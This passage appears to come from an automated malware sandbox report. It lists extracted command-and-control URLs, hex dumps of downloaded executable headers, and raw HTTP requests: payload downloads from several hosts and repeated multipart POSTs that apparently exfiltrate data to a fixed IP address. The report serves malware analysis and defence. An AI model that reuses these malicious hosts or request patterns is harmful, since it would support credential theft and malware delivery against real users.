            Source: C:\Windows\explorer.exeNetwork Connect: 104.196.109.209 443Jump to behavior
            Source: C:\Windows\explorer.exeNetwork Connect: 162.159.134.233 443Jump to behavior
            Source: Malware configuration extractorURLs: https://steamcommunity.com/profiles/76561199689717899
            Source: Malware configuration extractorURLs: http://trad-einmyus.com/index.php
            Source: Malware configuration extractorURLs: http://tradein-myus.com/index.php
            Source: Malware configuration extractorURLs: http://trade-inmyus.com/index.php
            Source: Malware configuration extractorURLs: http://cajgtus.com/test1/get.php
            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 25 May 2024 19:29:34 GMTContent-Type: application/octet-streamContent-Length: 751104Last-Modified: Sat, 25 May 2024 19:20:05 GMTConnection: closeETag: "665239e5-b7600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c4 2a 01 d0 80 4b 6f 83 80 4b 6f 83 80 4b 6f 83 8d 19 b0 83 9a 4b 6f 83 8d 19 8f 83 f7 4b 6f 83 8d 19 8e 83 a7 4b 6f 83 89 33 fc 83 87 4b 6f 83 80 4b 6e 83 e8 4b 6f 83 35 d5 8e 83 81 4b 6f 83 8d 19 b4 83 81 4b 6f 83 35 d5 b1 83 81 4b 6f 83 52 69 63 68 80 4b 6f 83 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 25 39 28 64 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 0c 00 00 e4 00 00 00 5c 90 02 00 00 00 00 c7 43 00 00 00 10 00 00 00 00 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 60 91 02 00 04 00 00 45 4f 0c 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 04 6a 01 00 50 00 00 00 00 80 90 02 68 d2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 54 6a 01 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 5f 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 6c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 14 e3 00 00 00 10 00 00 00 e4 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 48 72 00 00 00 00 01 00 00 74 00 00 00 e8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 60 ff 8e 02 00 80 01 00 00 46 09 00 00 5c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 68 d2 00 00 00 80 90 02 00 d4 00 00 00 a2 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 25 May 2024 19:29:42 GMTContent-Type: application/octet-streamContent-Length: 232448Last-Modified: Wed, 22 May 2024 09:20:03 GMTConnection: closeETag: "664db8c3-38c00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 31 14 2a 8b 75 75 44 d8 75 75 44 d8 75 75 44 d8 78 27 9b d8 6d 75 44 d8 78 27 a4 d8 03 75 44 d8 78 27 a5 d8 52 75 44 d8 7c 0d d7 d8 72 75 44 d8 75 75 45 d8 11 75 44 d8 c0 eb a1 d8 74 75 44 d8 78 27 9f d8 74 75 44 d8 c0 eb 9a d8 74 75 44 d8 52 69 63 68 75 75 44 d8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 8f f9 5f 65 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 0c 00 00 dc 00 00 00 18 88 02 00 00 00 00 7f 36 00 00 00 10 00 00 00 f0 00 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 10 89 02 00 04 00 00 5c 36 04 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 bc 50 01 00 50 00 00 00 00 90 88 02 28 77 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 51 01 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 46 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 5c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 b3 da 00 00 00 10 00 00 00 dc 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 96 68 00 00 00 f0 00 00 00 6a 00 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 40 20 87 02 00 60 01 00 00 ca 01 00 00 4a 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 28 77 00 00 00 90 88 02 00 78 00 00 00 14 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 25 May 2024 19:29:58 GMTServer: Apache/2.4.37 (Win64) PHP/5.6.40Last-Modified: Mon, 09 Oct 2023 19:50:06 GMTETag: "4ae00-6074de5a4a562"Accept-Ranges: bytesContent-Length: 306688Connection: closeContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 36 f8 06 6b 72 99 68 38 72 99 68 38 72 99 68 38 cf d6 fe 38 73 99 68 38 6c cb fd 38 6e 99 68 38 6c cb eb 38 fc 99 68 38 55 5f 13 38 7b 99 68 38 72 99 69 38 c9 99 68 38 6c cb ec 38 32 99 68 38 6c cb fc 38 73 99 68 38 6c cb f9 38 73 99 68 38 52 69 63 68 72 99 68 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 0e d2 b9 61 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 6a 03 00 00 98 3b 00 00 00 00 00 20 05 01 00 00 10 00 00 00 80 03 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 c0 3e 00 00 04 00 00 b0 bf 04 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 6c 68 03 00 64 00 00 00 00 90 3e 00 00 2f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 13 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 b8 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 b8 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 72 68 03 00 00 10 00 00 00 6a 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 a8 ff 3a 00 00 80 03 00 00 0e 01 00 00 6e 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6b 69 63 00 00 00 00 05 00 00 00 00 80 3e 00 00 02 00 00 00 7c 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 00 2f 00 00 00 90 3e 00 00 30 00 00 00 7e 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
            Source: global trafficHTTP traffic detected: GET /profiles/76561199689717899 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
            Source: Joe Sandbox ViewIP Address: 104.102.42.29 104.102.42.29
            Source: Joe Sandbox ViewIP Address: 65.109.242.59 65.109.242.59
            Source: Joe Sandbox ViewIP Address: 193.233.132.167 193.233.132.167
            Source: Joe Sandbox ViewIP Address: 193.233.132.167 193.233.132.167
            Source: Joe Sandbox ViewASN Name: UninetSAdeCVMX UninetSAdeCVMX
            Source: Joe Sandbox ViewASN Name: AARNET-AS-APAustralianAcademicandResearchNetworkAARNe AARNET-AS-APAustralianAcademicandResearchNetworkAARNe
            Source: Joe Sandbox ViewASN Name: AKAMAI-ASUS AKAMAI-ASUS
            Source: Joe Sandbox ViewASN Name: FREE-NET-ASFREEnetEU FREE-NET-ASFREEnetEU
            Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
            Source: Joe Sandbox ViewJA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
            Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
            Source: global trafficHTTP traffic detected: GET /klok.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: www.safeautomationbd.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DBFHDBGIEBFIIDGCBFBKUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 278Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /TEMPradius.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: nessotechbd.com
            Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DAEHJJECAEGCAAAAEGIEUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CGHCGIIDGDAKFIEBKFCFUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----FCBFBGDBKJKECAAKKFHDUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 332Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HJEBGHIEBFIJKECBKFHDUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 6437Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /sqls.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DHIJDHIDBGHJKECBFIIDUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 4677Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----FCBFBGDBKJKECAAKKFHDUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 1529Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AFBKKFBAEGDHJJJJKFBKUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 437Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JJJJKEHCAKFBFHJKEHCFUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 437Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /freebl3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /mozglue.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /msvcp140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /nss3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /softokn3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /vcruntime140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /get/Dztc3/3edag44.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: transfer.adttemp.com.br
            Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KFCFBFHIEBKJKFHIEBFBUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 1145Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CGHCGIIDGDAKFIEBKFCFUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CAFBGDHCBAEHIDGCGIDAUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----BGHJEBKJEGHJKECAAKJKUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 453Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /attachments/1234297369122832404/1240152736272744458/Ogsxr.exe?ex=664585bd&is=6644343d&hm=ab86f976d0139ed85f7d9db2329fe1dca0c9135ad507ed65702b0c38a838bc63& HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: cdn.discordapp.com
            Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----FCFHJKJJJECGDHJJDHDAUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 104621Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DHJECFCGHIDGHIDHDHIEUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DHCBAEHJJJKKFIDGHJECUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://kpyjjvqdiemoiebl.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 206Host: trad-einmyus.com
            Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://lelfqipvajp.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 298Host: trad-einmyus.com
            Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jncoidythmtum.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 293Host: trad-einmyus.com
            Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ecmpkonsxath.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 352Host: trad-einmyus.com
            Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qhahtsyildlx.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 193Host: trad-einmyus.com
            Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://gdvgvnpnsfha.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 191Host: trad-einmyus.com
            Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hexeftuymxc.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 279Host: trad-einmyus.com
            Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://vtxhrpouhnlhicef.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 368Host: trad-einmyus.com
            Source: global trafficHTTP traffic detected: GET /dl/buildz.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sdfjhuz.com
            Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://cmovmgvridjjk.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 355Host: trad-einmyus.com
            Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://uopmqrlryhqym.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 178Host: trad-einmyus.com
            Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://kdrrcifvupv.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 283Host: trad-einmyus.com
            Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://froejfbfqcabvk.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 123Host: trad-einmyus.com
            Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ijjaoopskaipyfot.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 199Host: trad-einmyus.com
            Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qlrqehiwqptv.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 329Host: trad-einmyus.com
            Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jkukpjjesbti.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 280Host: trad-einmyus.com
            Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mxmwgpprwcpwxem.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 136Host: trad-einmyus.com
            Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://bglvkirrchdcy.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 353Host: trad-einmyus.com
            Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://syppprqoaeoyrm.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 208Host: trad-einmyus.com
            Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://syrimjyxlgxo.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 135Host: trad-einmyus.com
            Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://doewnlgtcbtsgiu.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 162Host: trad-einmyus.com
            Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://uetjtbokcendpi.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 348Host: trad-einmyus.com
